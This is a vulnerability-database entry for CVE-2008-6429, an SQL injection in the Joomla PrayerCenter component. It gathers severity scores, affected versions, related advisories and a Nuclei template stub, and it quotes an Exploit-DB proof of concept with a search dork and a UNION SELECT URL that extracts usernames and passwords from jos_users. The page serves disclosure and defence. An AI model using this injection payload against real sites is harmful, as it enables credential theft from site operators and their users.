CVE-2008-6429
Published 2009-03-06
CVE-2008-6429: SQL injection vulnerability in the PrayerCenter (com_prayercenter) component 1.4.9 and earlier for Joomla! allows remote attackers to execute arbitrary SQL…
Priority P343 · high · 7.5 · CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS 1.39% · 68.8th percentile
SQL injection vulnerability in the PrayerCenter (com_prayercenter) component 1.4.9 and earlier for Joomla! allows remote attackers to execute arbitrary SQL commands via the id parameter in a view_request action to index2.php.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mike_leeper | com_prayercenter | <= 1.4.9 | — |
| mlwebtechnologies | prayercenter | — | — |
CVSS provenance
nvd · v2.0 · 7.5 · HIGH · AV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck · 7.5 · HIGH
GHSA
GHSA-475q-q69f-cvx2: SQL injection vulnerability in the PrayerCenter (com_prayercenter) component 1
ghsa_unreviewed·2022-05-17
CVE-2008-6429 [HIGH] CWE-89 GHSA-475q-q69f-cvx2: SQL injection vulnerability in the PrayerCenter (com_prayercenter) component 1
SQL injection vulnerability in the PrayerCenter (com_prayercenter) component 1.4.9 and earlier for Joomla! allows remote attackers to execute arbitrary SQL commands via the id parameter in a view_request action to index2.php.
GHSA
GHSA-7fgr-rxh7-75r8: SQL Injection exists in the PrayerCenter 3
ghsa_unreviewed·2022-05-14·CVSS 7.5
CVE-2018-7314 [HIGH] CWE-89 GHSA-7fgr-rxh7-75r8: SQL Injection exists in the PrayerCenter 3
SQL Injection exists in the PrayerCenter 3.0.2 component for Joomla! via the sessionid parameter, a different vulnerability than CVE-2008-6429.
VulnCheck
mlwebtechnologies prayercenter Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
vulncheck·2018·CVSS 7.5
CVE-2018-7314 [HIGH] mlwebtechnologies prayercenter Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
SQL Injection exists in the PrayerCenter 3.0.2 component for Joomla! via the sessionid parameter, a different vulnerability than CVE-2008-6429.
Affected: mlwebtechnologies prayercenter
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://unit42.paloaltonetworks.com/network-attack-trends-winter-2020/
No detection rules found.
Exploit-DB
Joomla! Component prayercenter 1.4.9 - 'id' SQL Injection
exploitdb·2008-05-31
CVE-2008-6429 Joomla! Component prayercenter 1.4.9 - 'id' SQL Injection
---
/---------------------------------------------------------------\
\ /
/ Joomla Component prayercenter Remote SQL injection \
\ /
\---------------------------------------------------------------/
[*] Author : His0k4 [ALGERIAN HaCkEr]
[*] Dork : inurl:"com_prayercenter"
[*] POC : http://localhost/[Joomla_Path]/index2.php?option=com_prayercenter&task=view_request&id={SQL}
[*] Example : http://localhost/[Joomla_Path]/index2.php?option=com_prayercenter&task=view_request&id=-1 UNION SELECT user(),user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user(),user(),user(),user() FROM jos_users--
[*] Note : Sometimes you need to register for doing this exploit
[*] Greetings : Str0ke, all friends & musli
Nuclei
Joomla! Component PrayerCenter 3.0.2 - SQL Injection
nuclei·CVSS 7.5
CVE-2018-7314 [HIGH] Joomla! Component PrayerCenter 3.0.2 - SQL Injection
SQL Injection exists in the PrayerCenter 3.0.2 component for Joomla! via the sessionid parameter, a different vulnerability than CVE-2008-6429.
Template:
```yaml
id: CVE-2018-7314
info:
  name: Joomla! Component PrayerCenter 3.0.2 - SQL Injection
  author: DhiyaneshDK
  severity: critical
  description: |
    SQL Injection exists in the PrayerCenter 3.0.2 component for Joomla! via the sessionid parameter, a different vulnerability than CVE-2008-6429.
  impact: |
    Unauthenticated attackers can execute arbitrary SQL commands to access, modify, or delete database contents, potentially compromising the entire Joomla installation.
  remediation: |
    Remove the vulnerable PrayerCenter component or upgrade to a patched version.
  reference:
    - https://www.exploit-db.com
```
No writeups or analysis indexed.
http://osvdb.org/45856
http://secunia.com/advisories/30493
https://exchange.xforce.ibmcloud.com/vulnerabilities/42772
https://www.exploit-db.com/exploits/5708
Published: 2009-03-06